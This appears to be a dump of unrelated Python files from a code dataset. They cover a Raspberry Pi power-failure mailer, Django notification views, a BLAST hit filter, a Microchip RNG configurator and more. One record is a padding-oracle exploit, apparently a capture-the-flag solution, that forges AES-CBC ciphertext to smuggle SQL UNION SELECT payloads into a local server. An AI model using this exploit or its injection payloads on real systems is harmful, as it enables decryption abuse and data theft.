    .tg .tg-0ord{text-align:right}
    .tg .tg-qnmb{font-weight:bold;font-size:16px;text-align:center}
    </style>
    <table class="tg">
      <tr>
        <th class="tg-qnmb" colspan="2">Ihr Raspberry Pi wurde neugestartet.</th>
      </tr>
    </table>
    </body>
    </html>
    """
    session = smtplib.SMTP(SERVER, PORT)
    session.set_debuglevel(1)
    session.ehlo()
    session.starttls()
    # NOTE(review): missing "()" -- this line is a no-op attribute access;
    # an EHLO after STARTTLS was presumably intended.
    session.ehlo
    session.login(EMAIL, PASSWORT)
    msg = MIMEText(BODY, 'html')
    msg['Subject'] = SUBJECT_Restart
    msg['From'] = EMAIL
    msg['To'] = ", ".join(EMPFAENGER)
    session.sendmail(EMAIL, EMPFAENGER, msg.as_string())
    Detect_Powerfail()
def Sendmail_Powerfail():
    """Send the 'power failure detected' mail, then wait for power to return.

    NOTE(review): tail-calls Detect_Powerback, forming unbounded mutual
    recursion with the Detect_*/Sendmail_* family -- see Sendmail_Restart.
    """
    # German HTML body: "StromPi has detected a POWER FAILURE!!!!"
    BODY = """
    <html>
    <head></head>
    <body>
    <style type="text/css">
    .tg {border-collapse:collapse;border-spacing:0;}
    .tg td{font-family:Arial, sans-serif;font-size:14px;padding:10px 5px;border-style:solid;border-width:1px;overflow:hidden;word-break:normal;}
    .tg th{font-family:Arial, sans-serif;font-size:14px;font-weight:normal;padding:10px 5px;border-style:solid;border-width:1px;overflow:hidden;word-break:normal;}
    .tg .tg-0ord{text-align:right}
    .tg .tg-qnmb{font-weight:bold;font-size:16px;text-align:center}
    </style>
    <table class="tg">
      <tr>
        <th class="tg-qnmb" colspan="2">StromPi hat einen STROMAUSFALL erkannt!!!!</th>
      </tr>
    </table>
    </body>
    </html>
    """
    session = smtplib.SMTP(SERVER, PORT)
    session.set_debuglevel(1)
    session.ehlo()
    session.starttls()
    # NOTE(review): missing "()" -- no-op attribute access (see Sendmail_Restart).
    session.ehlo
    session.login(EMAIL, PASSWORT)
    msg = MIMEText(BODY, 'html')
    msg['Subject'] = SUBJECT_Powerfail
    msg['From'] = EMAIL
    msg['To'] = ", ".join(EMPFAENGER)
    session.sendmail(EMAIL, EMPFAENGER, msg.as_string())
    Detect_Powerback()
def Sendmail_Powerback():
    """Send the 'power restored' mail, then resume watching for power failures.

    NOTE(review): tail-calls Detect_Powerfail, forming unbounded mutual
    recursion with the Detect_*/Sendmail_* family -- see Sendmail_Restart.
    """
    # German HTML body: "StromPi has detected that power is back!"
    BODY = """
    <html>
    <head></head>
    <body>
    <style type="text/css">
    .tg {border-collapse:collapse;border-spacing:0;}
    .tg td{font-family:Arial, sans-serif;font-size:14px;padding:10px 5px;border-style:solid;border-width:1px;overflow:hidden;word-break:normal;}
    .tg th{font-family:Arial, sans-serif;font-size:14px;font-weight:normal;padding:10px 5px;border-style:solid;border-width:1px;overflow:hidden;word-break:normal;}
    .tg .tg-0ord{text-align:right}
    .tg .tg-qnmb{font-weight:bold;font-size:16px;text-align:center}
    </style>
    <table class="tg">
      <tr>
        <th class="tg-qnmb" colspan="2">StromPi hat Spannung wiedererkannt!</th>
      </tr>
    </table>
    </body>
    </html>
    """
    session = smtplib.SMTP(SERVER, PORT)
    session.set_debuglevel(1)
    session.ehlo()
    session.starttls()
    # NOTE(review): missing "()" -- no-op attribute access (see Sendmail_Restart).
    session.ehlo
    session.login(EMAIL, PASSWORT)
    msg = MIMEText(BODY, 'html')
    msg['Subject'] = SUBJECT_Powerback
    msg['From'] = EMAIL
    msg['To'] = ", ".join(EMPFAENGER)
    session.sendmail(EMAIL, EMPFAENGER, msg.as_string())
    Detect_Powerfail()
def Detect_Powerback():
    """Block reading the serial port until the StromPi reports power returned,
    then send the power-back mail (which never returns -- mutual recursion)."""
    while 1:
        x=serial_port.readline()
        # StromPi messages are UTF-8 text lines; strict decoding raises on noise.
        y=x.decode(encoding='UTF-8',errors='strict')
        if y==('xxx--StromPiPowerBack--xxx\n'):
            print ("PowerBack - Email Sent")
            Sendmail_Powerback()
def Power_Lost(a):
    """Handle a detected power failure by sending the power-fail mail.

    NOTE(review): parameter `a` is unused; it matches the one-argument signature
    of RPi.GPIO event callbacks (channel number), but no GPIO event registration
    is visible in this file -- confirm this function is still wired up anywhere.
    """
    print ("Raspberry Pi Powerfail detected")
    print ("Powerfail_Email sent")
    Sendmail_Powerfail()
def Detect_Powerfail():
    """Block reading the serial port until the StromPi announces a shutdown or
    power failure, then send the power-fail mail (never returns -- mutual
    recursion with Sendmail_Powerfail/Detect_Powerback)."""
    while 1:
        x=serial_port.readline()
        y = x.decode(encoding='UTF-8',errors='strict')
        if y==('xxxShutdownRaspberryPixxx\n') or y==('xxx--StromPiPowerfail--xxx\n'):
            print ("PowerFail - Email Sent")
            Sendmail_Powerfail()
            # NOTE(review): unreachable in practice -- Sendmail_Powerfail never returns.
            time.sleep(3)
# Optionally announce the (re)boot, then enter the power-fail watch loop.
if Restart_Mail == 1:
    Sendmail_Restart()
try:
    Detect_Powerfail()
    # NOTE(review): unreachable -- Detect_Powerfail loops forever; kept as an
    # idle fallback should it ever return.
    while True:
        time.sleep(0.1)
except KeyboardInterrupt:
    print ("\nKeyboard Interrupt")
finally:
    # Always release GPIO resources on exit.
    GPIO.cleanup()
    print ("Cleaned up Pins")
328326 | import pandas as pd
from chispa import assert_df_equality
from cishouseholds.derive import assign_filename_column
from cishouseholds.pipeline.ETL_scripts import extract_input_data
def test_assign_filename_column(pandas_df_to_temporary_csv, spark_session):
    """assign_filename_column should add a column holding each row's source CSV path.

    Writes a 2-row pandas frame to a pipe-delimited temp CSV, loads it via
    extract_input_data, and checks the appended `csv_filename` column equals
    the "file:///" URI of that CSV for every row.
    """
    pandas_df = pd.DataFrame(
        data={
            "id": [0, 1],
            "dummy": ["first_value", "second_value"],
        }
    )
    csv_file_path = pandas_df_to_temporary_csv(pandas_df, sep="|")
    # Spark reports input paths as file:/// URIs; strip the leading "/" to
    # avoid "file:////" when joining.
    path = "file:///" + str(csv_file_path.as_posix()).lstrip("/")
    expected_df = spark_session.createDataFrame(
        data=[
            (0, "first_value", path),
            (1, "second_value", path),
        ],
        schema="id string, dummy string, csv_filename string",
    )
    input_df = extract_input_data(csv_file_path.as_posix(), None, sep="|")
    output_df = assign_filename_column(input_df, "csv_filename")
    assert_df_equality(expected_df, output_df, ignore_nullable=True)
| StarcoderdataPython |
1979564 | <gh_stars>0
# Read how many terms to sum, prompt for each term, and print the total.
termn = input("Number of Terms: ")
termn = int(termn)
# Collect each term as an int; prompts are numbered from 1.
terms = [int(input("Term " + str(i + 1) + ": ")) for i in range(termn)]
# Sum with the builtin instead of a manual accumulator loop.
final = sum(terms)
print(final)
9797954 | <gh_stars>100-1000
from django.http import HttpResponse
from django.shortcuts import get_object_or_404
from django.urls import reverse
from django.utils.decorators import method_decorator
from django.utils.translation import ugettext_noop
from django.views.generic import View
from djng.views.mixins import (
JSONResponseException,
JSONResponseMixin,
allow_remote_invocation,
)
from memoized import memoized
from corehq.apps.domain.decorators import login_required, require_superuser
from corehq.apps.hqwebapp.views import BasePageView
from corehq.apps.notifications.forms import NotificationCreationForm
from corehq.apps.notifications.models import (
DismissedUINotify,
IllegalModelStateException,
LastSeenNotification,
Notification,
)
class NotificationsServiceRMIView(JSONResponseMixin, View):
    """djng remote-method-invocation endpoint backing the notifications UI.

    All state-changing operations are exposed via @allow_remote_invocation
    and act on the logged-in user taken from the request.
    """
    urlname = "notifications_service"
    @method_decorator(login_required)
    def dispatch(self, request, *args, **kwargs):
        # Require authentication for every RMI call on this view.
        return super(NotificationsServiceRMIView, self).dispatch(request, *args, **kwargs)
    def get(self, request, *args, **kwargs):
        # Plain GETs are not used by the UI; return a placeholder body.
        return HttpResponse("foo")
    @allow_remote_invocation
    def get_notifications(self, in_data):
        """Return the user's notifications plus unread/last-seen summary flags."""
        # todo always grab alerts if they are still relevant
        notifications = Notification.get_by_user(self.request.user, self.request.couch_user)
        has_unread = len([x for x in notifications if not x['isRead']]) > 0
        last_seen_notification_date = LastSeenNotification.get_last_seen_notification_date_for_user(
            self.request.user
        )
        return {
            'hasUnread': has_unread,
            'notifications': notifications,
            'lastSeenNotificationDate': last_seen_notification_date
        }
    @allow_remote_invocation
    def mark_as_read(self, in_data):
        """Mark the notification identified by in_data['id'] as read for this user."""
        Notification.objects.get(pk=in_data['id']).mark_as_read(self.request.user)
        return {}
    @allow_remote_invocation
    def save_last_seen(self, in_data):
        """Record in_data['notification_id'] as the user's last-seen notification."""
        if 'notification_id' not in in_data:
            raise JSONResponseException('notification_id is required')
        notification = get_object_or_404(Notification, pk=in_data['notification_id'])
        try:
            notification.set_as_last_seen(self.request.user)
        except IllegalModelStateException as e:
            # Surface model-state violations to the client as RMI errors.
            raise JSONResponseException(str(e))
        return {
            'activated': notification.activated
        }
    @allow_remote_invocation
    def dismiss_ui_notify(self, in_data):
        """Dismiss the UI notification with slug in_data['slug'] and echo the new state."""
        if 'slug' not in in_data:
            raise JSONResponseException('slug for ui notify is required')
        DismissedUINotify.dismiss_notification(self.request.user, in_data['slug'])
        return {
            'dismissed': DismissedUINotify.is_notification_dismissed(self.request.user, in_data['slug'])
        }
class ManageNotificationView(BasePageView):
    """Superuser-only admin page for creating, (de)activating and deleting notifications."""
    urlname = 'manage_notifications'
    page_title = ugettext_noop("Manage Notification")
    template_name = 'notifications/manage_notifications.html'
    @method_decorator(require_superuser)
    def dispatch(self, request, *args, **kwargs):
        return super(ManageNotificationView, self).dispatch(request, *args, **kwargs)
    @property
    @memoized
    def create_form(self):
        # Bind POST data only for an actual "create" submission; memoized so
        # page_context and post() share one form instance per request.
        if self.request.method == 'POST' and 'submit' in self.request.POST:
            return NotificationCreationForm(self.request.POST)
        return NotificationCreationForm()
    @property
    def page_context(self):
        """Template context: all notifications (newest first) plus the creation form."""
        return {
            'alerts': [{
                'content': alert.content,
                'url': alert.url,
                'type': alert.get_type_display(),
                'activated': str(alert.activated),
                'isActive': alert.is_active,
                'id': alert.id,
            } for alert in Notification.objects.order_by('-created').all()],
            'form': self.create_form,
        }
    @property
    def page_url(self):
        return reverse(self.urlname)
    def post(self, request, *args, **kwargs):
        """Dispatch on the submit button name: create, activate, deactivate or remove."""
        if 'submit' in request.POST and self.create_form.is_valid():
            self.create_form.save()
        elif 'activate' in request.POST:
            # NOTE(review): .first() returns None for an unknown alert_id, which
            # would raise AttributeError here -- confirm IDs are always valid.
            note = Notification.objects.filter(pk=request.POST.get('alert_id')).first()
            note.activate()
        elif 'deactivate' in request.POST:
            note = Notification.objects.filter(pk=request.POST.get('alert_id')).first()
            note.deactivate()
        elif 'remove' in request.POST:
            Notification.objects.filter(pk=request.POST.get('alert_id')).delete()
        # Re-render the page with the updated list.
        return self.get(request, *args, **kwargs)
| StarcoderdataPython |
4870223 | import base64
import logging
from Crypto.Util.Padding import pad
from padding_oracle import AESPaddingOracle, Base64OracleClient
logger = logging.getLogger('padding-oracle')
logger.setLevel('INFO')
# CTF exploit driver: forge an AES-CBC ciphertext via a padding oracle so the
# decrypted JSON carries a SQL-injection payload in its "id" field.
if __name__ == "__main__":
    # The challenge uses a URL-safe-ish alphabet: ~ for =, ! for /, - for +.
    bas64_ciphertext = "<KEY>~~"
    bas64_ciphertext = bas64_ciphertext.replace('~', '=').replace('!', '/').replace('-', '+')
    ciphertext = base64.b64decode(bas64_ciphertext)
    # All-zero 16-byte key placeholder, re-encoded into the challenge alphabet.
    key = bytes.fromhex('00000000000000000000000000000000')
    key = base64.b64encode(key).decode('utf8')
    key = key.replace('=', '~').replace('/', '!').replace('+', '-')
    oracle_client = Base64OracleClient("http://localhost:5000/decrypt?post=")
    padding_oracle = AESPaddingOracle(oracle_client)
    # Earlier enumeration payloads kept for reference:
    # sql_statement = "UNION SELECT GROUP_CONCAT(body SEPARATOR ', ') as title, body FROM posts"
    # sql_statement = "UNION SELECT GROUP_CONCAT(title SEPARATOR ', ') as title, body FROM posts"
    # sql_statement = "UNION SELECT GROUP_CONCAT(id SEPARATOR ', ') as title, body FROM posts"
    # sql_statement = "UNION SELECT GROUP_CONCAT(COLUMN_NAME) AS title, EXTRA AS body FROM information_schema.columns WHERE TABLE_NAME = 'posts'"
    # sql_statement = "UNION SELECT GROUP_CONCAT(TABLE_NAME) AS title, ENGINE as body FROM information_schema.tables WHERE table_schema=DATABASE()"
    # sql_statement = "UNION SELECT GROUP_CONCAT(COLUMN_NAME) AS title,EXTRA AS body FROM information_schema.columns WHERE TABLE_NAME='tracking'"
    # sql_statement = "UNION SELECT GROUP_CONCAT(TABLE_NAME) AS title, ENGINE as body FROM information_schema.tables WHERE table_schema=DATABASE()"
    sql_statement = "UNION SELECT GROUP_CONCAT(headers SEPARATOR ',') as title,id as body FROM tracking"
    sql_statement_length = len(sql_statement)
    # Trim the flag filler so total plaintext length stays constant regardless
    # of the injected statement's length.
    flag = "^FLAG^0000000000000000000000000000000000000000000000000000000000000000$FLAG$" + key
    flag = flag[:-sql_statement_length]
    plaintext = f'{{"flag" : "{flag}", "id" : "0 {sql_statement}", "key" : ""}}'.encode('utf8')
    # PKCS#7-pad to the AES block size before forging.
    plaintext = pad(plaintext, 16)
    ciphertext = padding_oracle.encrypt(plaintext, ciphertext)
    # Re-encode the forged ciphertext back into the challenge alphabet.
    ciphertext = base64.b64encode(ciphertext).decode('utf8')
    ciphertext = ciphertext.replace('=', '~').replace('/', '!').replace('+', '-')
    print(f"Base 64 encoded and modified ciphertext: {ciphertext}")
1682464 | #!/usr/bin/env python
#purpose: extract reciprocal best BLAST matches for a pair of datasets
#usage: ./reciprocal_blast_hits.py a_vs_b b_vs_a col_query col_match col_score sort_order out_file
#example, requires both blast hits attained highest bit score (12th column in blast's '-outfmt 6'):
# ./reciprocal_blast_hits.py a_vs_b.blastout b_vs_a.blastout 1 2 12 high a_b.hits.out
#example, requires both blast hits attained lowest evalue (11th column in -outfmt 6):
# ./reciprocal_blast_hits.py a_vs_b.blastout b_vs_a.blastout 1 2 11 low a_b.hits.out
import sys
def stop_err( msg ):
    """Report *msg* on stderr (with a trailing newline) and exit with status 1."""
    # Write the diagnostic before terminating so callers see why we stopped.
    sys.stderr.write("%s\n" % msg)
    sys.exit(1)
def get_col_index(col_str):
    """Convert a 1-based column spec such as "3" or "c3" to a 0-based index.

    Accepts either a plain 1-based integer string or the Galaxy-style
    "c<N>" prefix form. Generalized (backward-compatibly) to tolerate
    surrounding whitespace and an uppercase "C" prefix.

    :param col_str: column specification string, e.g. "c12" or "12"
    :return: zero-based integer column index (N - 1)
    :raises ValueError: if the remainder is not a valid integer
    """
    col_str = col_str.strip()
    # Drop the optional leading column marker (e.g. "c12" -> "12").
    if col_str[:1].lower() == "c":
        col_str = col_str[1:]
    return int(col_str) - 1
def main():
    """Find reciprocal best BLAST hits between two tabular BLAST result files.

    Expects 7 CLI arguments: A-vs-B file, B-vs-A file, query column, match
    column, score column (all 1-based or "cN"), sort order ("high" for bit
    score / "low" for e-value) and an output path. Writes one tab-separated
    line per reciprocal best hit: A id, B id, A-vs-B score, B-vs-A score.
    """
    #Parse Command Line
    try:
        a_vs_b, b_vs_a, c_query, c_match, c_score, sort_order, out_file = sys.argv[1:]
    except:
        stop_err("Expect 7 arguments: two input files, column settings, output file")
    want_highest = want_lowest = False
    if sort_order == "high":
        want_highest = True
    elif sort_order == "low":
        want_lowest = True
    else:
        stop_err("Sort order argument should be high or low")
    if out_file in [a_vs_b, b_vs_a]:
        stop_err("Output file would overwrite an input file")
    # Convert the 1-based/"cN" column specs to 0-based indices.
    c_query = get_col_index(c_query)
    c_match = get_col_index(c_match)
    c_score = get_col_index(c_score)
    if len(set([c_query, c_match, c_score])) < 3:
        stop_err("Need three different column numbers!")
    # Pass 1: best-scoring B match for each A query (comment lines skipped).
    best_a_vs_b = dict()
    for line in open(a_vs_b):
        if line.startswith("#"): continue
        parts = line.rstrip("\n").split("\t")
        a = parts[c_query]
        b = parts[c_match]
        score = float(parts[c_score])
        if (a not in best_a_vs_b) \
           or (want_highest and score > best_a_vs_b[a][1]) \
           or (want_lowest and score < best_a_vs_b[a][1]):
            # Keep the original score string too, for verbatim output.
            best_a_vs_b[a] = (b, score, parts[c_score])
    b_short_list = set(b for (b,score, score_str) in best_a_vs_b.values())
    # Pass 2: best A match for each B query, restricted to Bs seen in pass 1.
    best_b_vs_a = dict()
    for line in open(b_vs_a):
        if line.startswith("#"): continue
        parts = line.rstrip("\n").split("\t")
        b = parts[c_query]
        a = parts[c_match]
        #if a not in best_a_vs_b:
        #    continue
        #stop_err("The A-vs-B file does not have A-ID %r found in B-vs-A file" % a)
        if b not in b_short_list: continue
        score = float(parts[c_score])
        if (b not in best_b_vs_a) \
           or (want_highest and score > best_b_vs_a[b][1]) \
           or (want_lowest and score < best_b_vs_a[b][1]):
            best_b_vs_a[b] = (a, score, parts[c_score])
    #TODO - Preserve order from A vs B?
    a_short_list = sorted(set(a for (a,score,score_str) in best_b_vs_a.values()))
    count = 0
    outfile = open(out_file, 'w')
    outfile.write("#A_id\tB_id\tA_vs_B\tB_vs_A\n")
    # Emit only mutual best hits: A's best is B AND B's best is A.
    for a in a_short_list:
        if a not in best_a_vs_b:
            continue
        b = best_a_vs_b[a][0]
        if b in best_b_vs_a and a == best_b_vs_a[b][0]:
            outfile.write("%s\t%s\t%s\t%s\n" % (a, b, best_a_vs_b[a][2], best_b_vs_a[b][2]))
            count += 1
    outfile.close()
    #print "Done, %i RBH found" % count
    print "Done with script"
if __name__ == '__main__':
main() | StarcoderdataPython |
3438773 | <gh_stars>0
"""*****************************************************************************
* Copyright (C) 2018-2019 Microchip Technology Inc. and its subsidiaries.
*
* Subject to your compliance with these terms, you may use Microchip software
* and any derivatives exclusively with Microchip products. It is your
* responsibility to comply with third party license terms applicable to your
* use of third party software (including open source software) that may
* accompany Microchip software.
*
* THIS SOFTWARE IS SUPPLIED BY MICROCHIP "AS IS". NO WARRANTIES, WHETHER
* EXPRESS, IMPLIED OR STATUTORY, APPLY TO THIS SOFTWARE, INCLUDING ANY IMPLIED
* WARRANTIES OF NON-INFRINGEMENT, MERCHANTABILITY, AND FITNESS FOR A
* PARTICULAR PURPOSE.
*
* IN NO EVENT WILL MICROCHIP BE LIABLE FOR ANY INDIRECT, SPECIAL, PUNITIVE,
* INCIDENTAL OR CONSEQUENTIAL LOSS, DAMAGE, COST OR EXPENSE OF ANY KIND
* WHATSOEVER RELATED TO THE SOFTWARE, HOWEVER CAUSED, EVEN IF MICROCHIP HAS
* BEEN ADVISED OF THE POSSIBILITY OR THE DAMAGES ARE FORESEEABLE. TO THE
* FULLEST EXTENT ALLOWED BY LAW, MICROCHIP'S TOTAL LIABILITY ON ALL CLAIMS IN
* ANY WAY RELATED TO THIS SOFTWARE WILL NOT EXCEED THE AMOUNT OF FEES, IF ANY,
* THAT YOU HAVE PAID DIRECTLY TO MICROCHIP FOR THIS SOFTWARE.
*****************************************************************************"""
################################################################################
#### Register Information ####
################################################################################
# Look up the RNGCON value-group and bitfield nodes from the device's ATDF
# description; these drive the UI symbols created in instantiateComponent.
rngValGrp_RNGCON_TRNGEN = ATDF.getNode('/avr-tools-device-file/modules/module@[name="RNG"]/value-group@[name="RNGCON__TRNGEN"]')
rngValGrp_RNGCON_PRNGEN = ATDF.getNode('/avr-tools-device-file/modules/module@[name="RNG"]/value-group@[name="RNGCON__PRNGEN"]')
rngValGrp_RNGCON_CONT = ATDF.getNode('/avr-tools-device-file/modules/module@[name="RNG"]/value-group@[name="RNGCON__CONT"]')
rngValGrp_RNGCON_TRNGMODE = ATDF.getNode('/avr-tools-device-file/modules/module@[name="RNG"]/value-group@[name="RNGCON__TRNGMODE"]')
rngBitFld_RNGCON_PLEN = ATDF.getNode('/avr-tools-device-file/modules/module@[name="RNG"]/register-group@[name="RNG"]/register@[name="RNGCON"]/bitfield@[name="PLEN"]')
rngBitFld_RNGCON_TRNGEN = ATDF.getNode('/avr-tools-device-file/modules/module@[name="RNG"]/register-group@[name="RNG"]/register@[name="RNGCON"]/bitfield@[name="TRNGEN"]')
rngBitFld_RNGCON_PRNGEN = ATDF.getNode('/avr-tools-device-file/modules/module@[name="RNG"]/register-group@[name="RNG"]/register@[name="RNGCON"]/bitfield@[name="PRNGEN"]')
rngBitFld_RNGCON_CONT = ATDF.getNode('/avr-tools-device-file/modules/module@[name="RNG"]/register-group@[name="RNG"]/register@[name="RNGCON"]/bitfield@[name="CONT"]')
rngBitFld_RNGCON_TRNGMODE = ATDF.getNode('/avr-tools-device-file/modules/module@[name="RNG"]/register-group@[name="RNG"]/register@[name="RNGCON"]/bitfield@[name="TRNGMODE"]')
################################################################################
#### Global Variables ####
################################################################################
# NOTE(review): `global` at module level is a no-op in Python; these lines only
# document which names the callback functions below treat as globals.
global rngInstanceName
global rngSym_RNGCON_PLEN
global rngSym_RNGCON_TRNGEN
global rngSym_RNGCON_PRNGEN
global rngSym_RNGCON_CONT
global rngSym_RNGCON_TRNGMODE
################################################################################
#### Business Logic ####
################################################################################
def _get_bitfield_names(node, outputList):
valueNodes = node.getChildren()
for ii in reversed(valueNodes):
dict = {}
if(ii.getAttribute('caption').lower() != "reserved"):
dict['desc'] = ii.getAttribute('caption')
dict['key'] = ii.getAttribute('caption')
value = ii.getAttribute('value')
if(value[:2]=='0x'):
temp = value[2:]
tempint = int(temp,16)
else:
tempint = int(value)
dict['value'] = str(tempint)
outputList.append(dict)
def combineValues(symbol, event):
    """Recompute the packed RNGCON register value from the individual UI symbols.

    Bit layout (from the shifts below): PLEN at bits 0+, TRNGEN bit 8,
    PRNGEN bit 9, CONT bit 10, TRNGMODE bit 11. Triggered whenever any of
    the dependent RNGCON_* symbols changes.
    """
    plenValue = rngSym_RNGCON_PLEN.getValue() << 0
    trngenValue = rngSym_RNGCON_TRNGEN.getValue() << 8
    prngenValue = rngSym_RNGCON_PRNGEN.getValue() << 9
    contValue = rngSym_RNGCON_CONT.getValue() << 10
    trngValue = rngSym_RNGCON_TRNGMODE.getValue() << 11
    rngconValue = plenValue + trngenValue + prngenValue + contValue + trngValue
    # setValue(value, 2): trailing 2 matches the flag used elsewhere in these
    # Harmony scripts -- TODO confirm its exact meaning in the framework API.
    symbol.setValue(rngconValue, 2)
def updateRNGClockWarningStatus(symbol, event):
    """Toggle the clock-warning comment: visible exactly when the RNG
    peripheral clock has been disabled in the Clock Manager."""
    clock_enabled = event["value"]
    symbol.setVisible(not clock_enabled)
################################################################################
#### Component ####
################################################################################
def instantiateComponent(rngComponent):
global rngInstanceName
global rngSym_RNGCON_PLEN
global rngSym_RNGCON_TRNGEN
global rngSym_RNGCON_PRNGEN
global rngSym_RNGCON_CONT
global rngSym_RNGCON_TRNGMODE
rngInstanceName = rngComponent.createStringSymbol("RNG_INSTANCE_NAME", None)
rngInstanceName.setVisible(False)
rngInstanceName.setDefaultValue(rngComponent.getID().upper())
print("Running " + rngInstanceName.getValue())
#Clock enable
Database.setSymbolValue("core", rngInstanceName.getValue() + "_CLOCK_ENABLE", True, 1)
rngSym_RNGCON_PLEN = rngComponent.createIntegerSymbol("RNGCON_PLEN", None)
rngSym_RNGCON_PLEN.setLabel(rngBitFld_RNGCON_PLEN.getAttribute("caption"))
rngSym_RNGCON_PLEN.setDefaultValue(0)
rngSym_RNGCON_PLEN.setMin(0)
rngSym_RNGCON_PLEN.setMax(64)
rngSym_RNGCON_PLEN.setVisible(True)
rngTRNGEN_names = []
_get_bitfield_names(rngValGrp_RNGCON_TRNGEN, rngTRNGEN_names)
rngSym_RNGCON_TRNGEN = rngComponent.createKeyValueSetSymbol("RNGCON_TRNGEN", None)
rngSym_RNGCON_TRNGEN.setLabel(rngBitFld_RNGCON_TRNGEN.getAttribute("caption"))
rngSym_RNGCON_TRNGEN.setDefaultValue(0)
rngSym_RNGCON_TRNGEN.setOutputMode("Value")
rngSym_RNGCON_TRNGEN.setDisplayMode("Description")
for ii in rngTRNGEN_names:
rngSym_RNGCON_TRNGEN.addKey( ii['desc'], ii['value'], ii['key'] )
rngSym_RNGCON_TRNGEN.setVisible(True)
rngPRNGEN_names = []
_get_bitfield_names(rngValGrp_RNGCON_PRNGEN, rngPRNGEN_names)
rngSym_RNGCON_PRNGEN = rngComponent.createKeyValueSetSymbol("RNGCON_PRNGEN", None)
rngSym_RNGCON_PRNGEN.setLabel(rngBitFld_RNGCON_PRNGEN.getAttribute("caption"))
rngSym_RNGCON_PRNGEN.setDefaultValue(0)
rngSym_RNGCON_PRNGEN.setOutputMode("Value")
rngSym_RNGCON_PRNGEN.setDisplayMode("Description")
for ii in rngPRNGEN_names:
rngSym_RNGCON_PRNGEN.addKey( ii['desc'], ii['value'], ii['key'] )
rngSym_RNGCON_PRNGEN.setVisible(True)
rngCONT_names = []
_get_bitfield_names(rngValGrp_RNGCON_CONT, rngCONT_names)
rngSym_RNGCON_CONT = rngComponent.createKeyValueSetSymbol("RNGCON_CONT", None)
rngSym_RNGCON_CONT.setLabel(rngBitFld_RNGCON_CONT.getAttribute("caption"))
rngSym_RNGCON_CONT.setDefaultValue(0)
rngSym_RNGCON_CONT.setOutputMode("Value")
rngSym_RNGCON_CONT.setDisplayMode("Description")
for ii in rngCONT_names:
rngSym_RNGCON_CONT.addKey( ii['desc'], ii['value'], ii['key'] )
rngSym_RNGCON_CONT.setVisible(True)
rngTRNGMODE_names = []
_get_bitfield_names(rngValGrp_RNGCON_TRNGMODE, rngTRNGMODE_names)
rngSym_RNGCON_TRNGMODE = rngComponent.createKeyValueSetSymbol("RNGCON_TRNGMODE", None)
rngSym_RNGCON_TRNGMODE.setLabel(rngBitFld_RNGCON_TRNGMODE.getAttribute("caption"))
rngSym_RNGCON_TRNGMODE.setDefaultValue(0)
rngSym_RNGCON_TRNGMODE.setOutputMode("Value")
rngSym_RNGCON_TRNGMODE.setDisplayMode("Description")
for ii in rngTRNGMODE_names:
rngSym_RNGCON_TRNGMODE.addKey( ii['desc'], ii['value'], ii['key'] )
rngSym_RNGCON_TRNGMODE.setVisible(True)
# Collect user input to combine into the RNGCON register value.
rngSym_RNGCON = rngComponent.createHexSymbol("RNGCON_VALUE", None)
rngSym_RNGCON.setDefaultValue(0)
rngSym_RNGCON.setVisible(False)
# Bug fix: register all RNGCON bit-field symbols in a single setDependencies()
# call. Successive setDependencies() calls on the same symbol replace the
# previous dependency list, so previously only the last field (TRNGMODE)
# triggered combineValues when changed.
rngSym_RNGCON.setDependencies(combineValues, ["RNGCON_PLEN", "RNGCON_TRNGEN", "RNGCON_PRNGEN", "RNGCON_CONT", "RNGCON_TRNGMODE"])
# Clock Warning status
rngSym_ClkEnComment = rngComponent.createCommentSymbol("RNG_CLOCK_ENABLE_COMMENT", None)
rngSym_ClkEnComment.setLabel("Warning!!! " + rngInstanceName.getValue() + " Peripheral Clock is Disabled in Clock Manager")
rngSym_ClkEnComment.setVisible(False)
rngSym_ClkEnComment.setDependencies(updateRNGClockWarningStatus, ["core." + rngInstanceName.getValue() + "_CLOCK_ENABLE"])
############################################################################
#### Dependency ####
############################################################################
############################################################################
#### Code Generation ####
############################################################################
configName = Variables.get("__CONFIGURATION_NAME")
rngHeader1File = rngComponent.createFileSymbol("RNG_HEADER1", None)
rngHeader1File.setMarkup(True)
rngHeader1File.setSourcePath("../peripheral/rng_00159/templates/plib_rng.h.ftl")
rngHeader1File.setOutputName("plib_rng.h")
rngHeader1File.setDestPath("peripheral/rng/")
rngHeader1File.setProjectPath("config/" + configName + "/peripheral/rng/")
rngHeader1File.setType("HEADER")
rngHeader1File.setOverwrite(True)
rngSource1File = rngComponent.createFileSymbol("RNG_SOURCE1", None)
rngSource1File.setMarkup(True)
rngSource1File.setSourcePath("../peripheral/rng_00159/templates/plib_rng.c.ftl")
rngSource1File.setOutputName("plib_rng.c")
rngSource1File.setDestPath("peripheral/rng/")
rngSource1File.setProjectPath("config/" + configName + "/peripheral/rng/")
rngSource1File.setType("SOURCE")
rngSource1File.setOverwrite(True)
rngSystemInitFile = rngComponent.createFileSymbol("RNG_INIT", None)
rngSystemInitFile.setType("STRING")
rngSystemInitFile.setOutputName("core.LIST_SYSTEM_INIT_C_SYS_INITIALIZE_PERIPHERALS")
rngSystemInitFile.setSourcePath("../peripheral/rng_00159/templates/system/initialization.c.ftl")
rngSystemInitFile.setMarkup(True)
rngSystemDefFile = rngComponent.createFileSymbol("RNG_DEF", None)
rngSystemDefFile.setType("STRING")
rngSystemDefFile.setOutputName("core.LIST_SYSTEM_DEFINITIONS_H_INCLUDES")
rngSystemDefFile.setSourcePath("../peripheral/rng_00159/templates/system/definitions.h.ftl")
rngSystemDefFile.setMarkup(True)
| StarcoderdataPython |
3406898 | #!/usr/bin/env python
from __future__ import absolute_import, print_function
import sys
import re
import six
from subprocess import check_output
def to_string(ver):
    """Render a version tuple such as (19, 3, 5) as "19.3.5".

    Returns the empty string for None or an empty sequence (used when an
    optional max version is absent).
    """
    if not ver:
        return ""
    # str() is sufficient here; the six.text_type indirection was only
    # needed for Python 2, which this script's docker() check no longer
    # targets (docker 19.03 is a Python-3-era requirement).
    return ".".join(str(c) for c in ver)
def exit_if_not_within(ver, min_ver, max_ver=None):
    """Exit the process with status 1 unless min_ver <= ver (<= max_ver).

    Version bounds are compared as tuples; max_ver is optional.
    """
    out_of_range = ver < min_ver or (max_ver and ver > max_ver)
    if not out_of_range:
        return
    rendered = tuple(to_string(v) for v in (ver, min_ver, max_ver))
    print("Version {} doesn't fall into the range [{},{}]".format(*rendered),  # noqa
          file=sys.stderr)
    sys.exit(1)
def docker():
    """
    Checks that the installed docker is at least version 19.3.

    Runs ``docker --version``, parses the major.minor.patch triple, and
    exits (via exit_if_not_within) when the version is out of range.
    """
    pattern = r"Docker version (\d+)\.(\d+)\.(\d+)"
